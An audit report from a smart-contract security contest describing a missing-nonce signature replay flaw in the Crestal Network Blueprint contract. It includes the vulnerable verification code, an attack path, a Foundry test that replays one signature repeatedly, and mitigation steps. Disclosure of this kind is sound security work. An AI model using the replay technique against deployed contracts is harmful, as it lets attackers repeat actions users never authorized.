Great Oily Seagull

Medium

# Missing Nonce in Signature Verification across Blueprint functions

### Summary

The smart contract does not use a nonce when verifying signatures. This makes it vulnerable to replay attacks, where an attacker can reuse a valid signature to perform unauthorized actions multiple times


https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L48


### Root Cause

Root cause lies in signature verification logic. We should ensure nonce is stored in contract variable and proper validation is done to make sure same nonce of the sender is not used again.

```solidity
    function getSignerAddress(
        bytes32 hash,
        bytes memory signature
    ) public pure returns (address) {
        address signerAddr = ECDSA.recover(hash, signature);
        require(signerAddr != address(0), "Invalid signature");
        return signerAddr;
    }
```


### Internal Pre-conditions

NA

### External Pre-conditions

NA

### Attack Path

1. A user signs a message for a transaction.
2. The blueprint protocol verifies the signature and proceed to next step.
3. Attacker can reuse the same signature and call the blueprint again. The contract verifies it successfully and executes the transaction again, even though the user did not intend it.


### Impact

An attacker can replay a previously signed transaction, leading to unintended state changes. This issue can lead to severe security risks if not addressed. Adding a nonce ensures that each signature is used only once, preventing replay attacks.

### PoC


### BlueprintV5.t.sol
```solidity
    function test_updateWorkerDeploymentAudit() public {
        address user = vm.addr(0xA11CE);
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "app.crestal.network";

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // set zero cost for create agents, use any number less than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);

        // set zero cost for create agents, use any number less than 0
        blueprint.setUpdateCreateAgentTokenCost(address(mockToken), 0);

        vm.startPrank(user);

        // Create agent with token
        bytes32 requestId = blueprint.createAgentWithToken(
            projectId,
            base64Proposal,
            workerAddress,
            serverURL,
            address(mockToken)
        );

        // Expect the UpdateDeploymentConfig event
        vm.expectEmit(true, true, true, true);
        emit BlueprintCore.UpdateDeploymentConfig(
            projectId,
            requestId,
            workerAddress,
            base64Proposal
        );

        // update agent deployment config
        blueprint.updateWorkerDeploymentConfig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal
        );

        // Generate the signature
        (bytes memory signature1, address signerAddress1) = generateSignature(
            projectId,
            base64Proposal,
            serverURL
        );
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        //@audit - i can repeat the same signature multiple times
        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        blueprint.updateWorkerDeploymentConfigWithSig(
            address(mockToken),
            projectId,
            requestId,
            base64Proposal,
            signature1
        );

        vm.stopPrank();
    }

```

### Mitigation

To mitigate the issue, do the following steps

1. Introduce a nonce mechanism.
2. Store used nonces to prevent signature reuse.
3. Modify the signed message to include the nonce